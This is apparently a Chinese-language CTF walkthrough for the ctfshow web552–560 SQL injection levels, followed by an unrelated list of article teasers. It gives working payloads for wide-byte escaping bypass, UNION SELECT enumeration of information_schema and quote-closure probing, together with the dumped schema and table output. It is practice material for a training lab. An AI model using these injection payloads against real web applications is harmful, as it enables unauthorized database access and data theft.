ctfshow web入门 sqli-libs web552--web560

web552

宽字节注入
嗯原理我就不讲了,还是有点复杂后面有时间讲讲
总而言之就是用汉字把\的转义作用抵消了然后正常注入即可
在这里插入图片描述
在这里插入图片描述

?id=-1包' union select 1,2,3--+?id=-1包'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77),3--+?id=-1包'union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773),3--+?id=-1包'union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web553

与上题同

web554

在这里插入图片描述
在这里插入图片描述

passwd=admin&uname=爱' union select 1,2--+passwd=admin&uname=爱' union select 1,(select group_concat(schema_name) from information_schema.schemata)--+
Your Password:ctfshow,ctftraining,information_schema,mysql,performance_schema,security,testpasswd=admin&uname=爱' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77)--+
Your Password:flagspasswd=admin&uname=爱' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773)--+
Your Password:id,flag4spasswd=admin&uname=爱' union select 1,(select group_concat(flag4s) from ctfshow.flags)--+

web555

在这里插入图片描述
警告是说第一个参数应该是一个数而不是布尔

?id=1.1 union select 1,2,3--+?id=1.1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77),3--+?id=1.1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773),3--+?id=1.1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

后面发现-1也可以
在这里插入图片描述
在这里插入图片描述

web556

又变成宽字节了

?id=-1爱' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77),3--+?id=-1爱' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773),3--+?id=-1爱' union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web557

在这里插入图片描述
在这里插入图片描述
这东西和前面的一模一样感觉在凑数

passwd=admin&uname=爱' union select 1,2--+passwd=admin&uname=爱' union select 1,(select group_concat(schema_name) from information_schema.schemata)--+
Your Password:ctfshow,ctftraining,information_schema,mysql,performance_schema,security,testpasswd=admin&uname=爱' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77)--+
Your Password:flagspasswd=admin&uname=爱' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773)--+
Your Password:id,flag4spasswd=admin&uname=爱' union select 1,(select group_concat(flag4s) from ctfshow.flags)--+

web558

简单的联合注入

?id=-1' union select 1,2,3--+?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3--+?id=-1' union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web559

Please input the ID as parameter with numeric value
要一个数字参数
?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3--+?id=-1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web560

测出闭合
?id=-1') or 1--+
?id=-1') or 0--+
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3--+?id=-1') union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/38793.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

事过无悔:人生中的释怀之道

在纷繁复杂的人生旅途中,我们常常会面临各种选择。这些选择,如同指引我们前行的路标,有时让我们欣喜,有时让我们遗憾。然而,我渐渐发现,事过无悔,是我们在面对这些选择时最顶级的释怀之道。 首…

MySQL 常见存储引擎详解(一)

本篇主要介绍MySQL中常见的存储引擎。 目录 一、InnoDB引擎 简介 特性 最佳实践 创建InnoDB 存储文件 二、MyISAM存储引擎 简介 特性 创建MyISAM表 存储文件 存储格式 静态格式 动态格式 压缩格式 三、MEMORY存储引擎 简介 特点 创建MEMORY表 存储文件 内…

节点级、系统级、实车级的LIN测试主要差异点

文章目录 前言一、节点级1.前期准备2.测试执行 二、系统级1.前期准备2.测试执行 三、实车级1.前期准备2.测试执行 总结 前言 LIN协议一致性测试主要指的是物理层(电阻、电容、电压、地偏移、显隐性电平、频率占空比、位时间等)、数据链路层(…

window用户层文件系统fuse(wdm驱动)

dokany https://github.com/dokan-dev/dokany.git 需要安装wdk,2022可以直接通过windows driver扩展安装 项目使用nuget添加wdk依赖 Version of Uwp Package 10.0.26100.0 does not match TargetPlatformVersion 10.0.22621.0. windows sdk版本填写正确的版本号…

算法实验2.2、2.3

2.2主要内容 比较快速排序&#xff0c;归并排序以及堆排序算法的时间效率。了解影响算法执行时间的 主要因素以及如何降低算法的执行时间。 #include<iostream> using namespace std; #include<stdio.h> #include<malloc.h> #include<stdlib.h> #inc…

【论文阅读】-- 研究时间序列可视化,提升用户体验

Investigating Time Series Visualisations to Improve the User Experience 摘要1 引言2 相关工作互动技巧视觉编码坐标系 3 用户研究时间序列可视化互动技巧任务实验设计 4 结果交互技术的效果视觉编码的影响坐标系的影响 5 讨论交互技术的效果视觉编码的影响坐标系的影响 6 …

芒果YOLOv10改进122:注意力机制系列:最新结合即插即用CA(Coordinate attention) 注意力机制,CVPR 顶会助力分类检测涨点!

论文所提的Coordinate注意力很简单,可以灵活地插入到经典的移动网络中,而且几乎没有计算开销。大量实验表明,Coordinate注意力不仅有益于ImageNet分类,而且更有趣的是,它在下游任务(如目标检测和语义分割)中表现也很好。本文结合目标检测任务应用 应专栏读者的要求,写一…

cube-studio开源一站式机器学习平台,在线ide,jupyter,vscode,matlab,rstudio,ssh远程连接,tensorboard

全栈工程师开发手册 &#xff08;作者&#xff1a;栾鹏&#xff09; 一站式云原生机器学习平台 前言 开源地址&#xff1a;https://github.com/tencentmusic/cube-studio cube studio 腾讯开源的国内最热门的一站式机器学习mlops/大模型训练平台&#xff0c;支持多租户&…

【Linux】:环境变量

朋友们、伙计们&#xff0c;我们又见面了&#xff0c;本期来给大家解读一下有关Linux环境变量的相关知识点&#xff0c;如果看完之后对你有一定的启发&#xff0c;那么请留下你的三连&#xff0c;祝大家心想事成&#xff01; C 语 言 专 栏&#xff1a;C语言&#xff1a;从入门…

mac|浏览器链接不上服务器但可以登微信

千万千万千万不要没有关梯子直接关机&#xff0c;不然就会这样子呜呜呜 设置-网络&#xff0c;点击三个点--选择--位置--编辑位置&#xff08;默认是自动&#xff09; 新增一个&#xff0c;然后选中点击完成 这样就可以正常上网了

【嵌入式DIY实例】- LCD ST7735显示DHT11传感器数据

LCD ST7735显示DHT11传感器数据 文章目录 LCD ST7735显示DHT11传感器数据1、硬件准备与接线2、代码实现本文介绍如何将 ESP8266 NodeMCU 板 (ESP-12E) 与 DHT11 (RHT01) 数字湿度和温度传感器连接。 NodeMCU 从 DHT11 传感器读取温度(以 C 为单位)和湿度(以 rH% 为单位)值,…

计算机网络-第5章运输层

5.1运输层协议概述 5.1.1进程之间的通信 运输层向它上面的应用层提供通信服务&#xff0c;它属于面向通信部分的最高层&#xff0c;同时也是用户功能中的最低层。 通信的两端应当是两个主机中的应用进程。 运输层复用和分用&#xff1a;复用指在发送方不同的应用进程都可以…

【机器学习】FFmpeg+Whisper:二阶段法视频理解(video-to-text)大模型实战

目录 一、引言 二、FFmpeg工具介绍 2.1 什么是FFmpeg 2.2 FFmpeg核心原理 2.3 FFmpeg使用示例 三、FFmpegWhisper二阶段法视频理解实战 3.1 FFmpeg安装 3.2 Whisper模型下载 3.3 FFmpeg抽取视频的音频 3.3.1 方案一&#xff1a;命令行方式使用ffmpeg 3.3.2 方案二&a…

基于协同过滤的电影推荐与大数据分析的可视化系统

基于协同过滤的电影推荐与大数据分析的可视化系统 在大数据时代&#xff0c;数据分析和可视化是从大量数据中提取有价值信息的关键步骤。本文将介绍如何使用Python进行数据爬取&#xff0c;Hive进行数据分析&#xff0c;ECharts进行数据可视化&#xff0c;以及基于协同过滤算法…

SuperMap GIS基础产品FAQ集锦(20240701)

一、SuperMap iDesktopX 问题1&#xff1a;对于数据提供方提供的osgb格式的数据&#xff0c;如何只让他生成一个s3mb文件呢&#xff1f;我用倾斜入库的方式会生成好多个s3mb缓存文件 11.1.1 【解决办法】不能控制入库后只生成一个s3mb文件&#xff1b;可以在倾斜入库的时候设…

2024第17届中国西部(重庆)留学移民海外置业展览会

2024第17届中国西部&#xff08;重庆&#xff09;留学移民海外置业展览会 邀请函 主办单位&#xff1a; 中国西部教体医融合博览会组委会 承办单位&#xff1a;重庆中博展览有限公司 展会背景&#xff1a; 成都和重庆是中国新一线城市&#xff0c;是西部经济的核心增长极&a…

代码随想录算法训练营第59天:动态[1]

代码随想录算法训练营第59天&#xff1a;动态 两个字符串的删除操作 力扣题目链接(opens new window) 给定两个单词 word1 和 word2&#xff0c;找到使得 word1 和 word2 相同所需的最小步数&#xff0c;每步可以删除任意一个字符串中的一个字符。 示例&#xff1a; 输入: …

实施粘贴式导航_滚动事件

● 所谓的粘贴式导航&#xff0c;就是当我们滑动页面到某一个位置的时候&#xff0c;导航不会因为滑动而消失&#xff0c;会固定在页面的顶部&#xff0c;我们来看一下如何实现&#xff1b; ● 首先我们要获取我们想要滚动到哪一部分的时候让导航栏显示出来&#xff0c;这就需要…

Java案例抢红包

目录 一&#xff1a;题目要求&#xff1a; 二&#xff1a;思路分析&#xff1a;&#xff08;遇见问题先想出完整的思路逻辑再去动手事半功倍&#xff09; 三&#xff1a;具体代码&#xff1a; 一&#xff1a;题目要求&#xff1a; 二&#xff1a;思路分析&#xff1a;&#x…

Cosine 余弦相似度并行计算的数学原理与Python实现

背景 Cosine 我在LLM与RAG系列课程已经讲了很多次了&#xff0c;这里不在熬述&#xff0c;它在LLM分析中&#xff0c;尤其是在语义相似度的计算中至关重要&#xff0c;在dot attention机制中&#xff0c;也会看到他的身影。这里讲的是纯数学上的运算与python是如何运用相关库进…